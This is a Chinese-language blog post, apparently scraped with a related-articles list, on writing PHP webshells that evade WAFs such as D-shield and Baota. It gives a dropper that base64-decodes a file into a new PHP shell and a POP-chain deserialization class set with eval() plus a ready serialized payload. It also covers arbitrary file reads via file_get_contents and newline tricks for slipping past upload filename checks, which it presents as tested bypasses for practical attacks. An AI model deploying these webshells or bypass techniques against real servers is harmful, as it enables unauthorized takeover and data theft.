$path ="/xx/xxx/xx/1.php";

$str= file_get_contents($path);

$strs = base64_decode($str);

$s1mple = fopen("./s1mple.php","w");

fwrite($s1mple,$strs);fclose($s1mple);?>

代码逻辑简单,将我们的文件,进行了base64解密,然后写入的一个新的php文件中,这样避免了file_put_contents这个极大概率被ban的函数的出现,又成功的写入了文件,我们访问2.php,然后再访问s1mple.php就可以拿到shell;载荷效果如下:

四:利用低危木马;

基于第三种方法,我们如果不是拿权限的话,也是可以利用一些低危的操作,比如任意文件读取等等;

下面先来看这段getshell的代码

或者换种方法,这里我们可以直接file_get_contents函数进行攻击,

这样也就可以达到任意文件读取,当然,因为php的特性,也可以对file_get_contents进行各种处理,使其绕过waf;也可以结合其他php的内置函数进行攻击,可以类比;这里不在细说;

五:利用逻辑问题

这种思想比较新颖;简单来说,我们并不是传入恶意代码,而是传入一段正常的代码,然后通过逻辑修改其运作走向,从而达到恶意执行,那么适合的就是pop链的构造了;

<?phperror_reporting (0);class s1mple{public $A;function __construct{$this->A=new hacker;}function __destruct{$this->A->action;}}class hacker{function action{echo "hello_hacker";}}class evil{public $data;function action{eval($this->data);}}unserialize($_GET['a']);

先来看正常的代码;这段代码中我们按照正常的逻辑分析,肯定是没有问题的;但是我们可以利用逻辑,改变其执行的走向从而进行对象注入达到攻击;

O:6:"s1mple":1:{s:1:"A";O:4:"evil":1:{s:4:"data";s:10:"phpinfo;";}}

在我们一般的上传中,往往是图片,就单代码而言,其大小是微乎其微的;所以在实战中也可用到;而且很难被检测到;当然,这只是一种方式,也可以结合回调函数和其他的函数,可以将其隐藏起来,然后利用pop触发;而且如果代码伪造的合适的话,也是可以骗过管理员从而避免被管理员删除的;

六:利用过宝塔waf思路另辟蹊径绕过waf

宝塔的waf对于文件明后缀的检测,是可以通过换行进行绕过的;就譬如我们在例子一中说的那样,那么我们除了对于我们后缀进行换行绕过,我们也可以考虑对我们的filename做手脚;对filename做换行,也可以绕过;

以上这些方法也算是新式方法,当然也可以考虑异或或者自增的木马,也可以通过混淆进行攻击,都可;但是实际中这些往往会被检测,上述的几种方法都是测试后可绕过D盾或者绕过宝塔的方法,供参考;另外一些方法需要可以首先绕过上传对后缀的检测,比如可以换行绕过宝塔对后缀的检测;如果可以上传php,那么以上方法即可任意发挥攻击。

相关实验:WAF渗透攻防实践

通过该实验了解基于规则的WAF的工作原理,通过分析相关防御规则,尝试使用多种方法进行绕过,使读者直观感受攻防双方的博弈过程。

2020php木马文件,绕过waf的另类木马文件攻击方法相关推荐

  1. 过云锁php木马,绕过waf的另类木马文件攻击方法

    很久没写文章了,继上次发先文章到今天已经很久了:很久没写文章了,继上次发先文章到今天已经很久了:今天突发异想:因为之前打了西湖论剑,遇到了宝塔的waf,最后也是过去了,便觉得另类的攻击方法值得写篇文章 ...

  2. 绕过WAF运行命令执行漏洞的方法大全

    文章目录 **前言** **一.windows下** 二.进入linux 三.一个有趣的例子 总结 前言 作者:掌控安全-桐镜 今天发散一下思维,聊聊关于命令执行漏洞绕过过滤的方法,让我们一起由浅入深 ...

  3. 使用rundll32.exe绕过应用程序白名单(多种方法)

    0x00 前言 本文演示了白名单AppLocker bypass的最常见和最熟悉的技术.我们知道,出于安全原因,系统管理员添加组策略来限制本地用户的应用程序执行.在上一篇文章中,我们讨论了" ...

  4. 如何让一句话木马绕过waf的检测 ?

    一.什么是一句话木马? 一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能.为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令. ...

  5. php过waf 一句话,(转)一句话木马绕过WAF

    在渗透测试的后期,为了维持权限.我们通常都会选择使用大小马或者通过添加账户等各种各样的方式给自己留个后门.但是事情总不是一帆风顺的,在上传一句话木马以及使用一句话木马的过程中我们要跟WAF斗智斗勇.今 ...

  6. 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】

    靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...

  7. 文件上传漏洞(一句话木马)-学习笔记

    什么是webshell? 渗webshell就是以asp.php.jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门.黑客在入侵了一个网站后,通常会将asp或php后门 ...

  8. 上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)

    1.常见漏洞分类 2.常见验证手段 可抓包后修改扩展名为图片格式,再上传可绕过验证.如: 可以修改php文件后缀为其他,再上传.如test.php.xxx  可对图片文件添加一句话木马,再修改为.ph ...

  9. 实战: unicorn生成免杀木马,绕过win10防火墙和windows defender

    实战: unicorn生成免杀木马,绕过win10防火墙和windows defender 简介 原理 步骤 攻击 总结 简介 随着操作系统的安全等级越来越高,对能免杀,无视防火墙的木马需求也越来越高 ...

最新文章

  1. 深度学习对抗样本的八个误解与事实
  2. 卡方 matlab,matlab卡方分布 卡方检验(Chi-square test)及其MATLAB实现 - 余姚娱乐网
  3. CODING 2.0 企业级持续交付解决方案
  4. c# sizeof_C#程序演示sizeof()运算符的示例
  5. Python网络爬虫与信息提取[request库的应用](单元一)
  6. opencv 从原始的图像中找出ROI区域
  7. DCTDAO将于3月27日在TrustSwap发行代币DCTD
  8. SSM框架之多数据源配置
  9. Zabbix 系统监控(二)Linux 系统监控
  10. L1-012 计算指数
  11. 联想Y720,win10下安装双系统Ubuntu过程遇到的一些问题及解决方法
  12. WIN 10 系统Alt + Tab 切换窗口卡顿问题结局方案
  13. jmeter汉化仍有英文_【jmeter】Jmeter 修改启动默认语言:将英文版修改为其他语言版本...
  14. 微软在2022年Gartner云计算AI开发者服务魔力象限中被评为“领导者”
  15. 酷家乐怎样把两个方案合并_两个地产科技的理工男联姻:他们都想做一家云端的Autodesk...
  16. 将tensor转换为image
  17. Anaconda的升级、配置及使用
  18. [Jo厨]Jupyter Notebook+VsCode+豆沙绿主题
  19. javaScript写的飞机大战小游戏
  20. 英语四级考前重点词汇【3】

热门文章

  1. 苹果电脑锁屏忘记密码
  2. 工业物联网与物联网区别_物联网节约用水,第1部分
  3. 总结信息安全管理体系如何落地?
  4. char与wchar_t字符串
  5. 树莓派右上角颜色块含义(供电, 散热)
  6. [vue] slot插槽 默认插槽,具名插槽,作用域插槽
  7. 电脑只有搜狗浏览器能上网,别的浏览器都不能上网
  8. Linux磁盘修复e2fsck命令
  9. 移动端手机上传图片处理
  10. android 上面月亮模式,玩安卓套路?月亮模式与息屏显示,iPhone13爆料多可信?...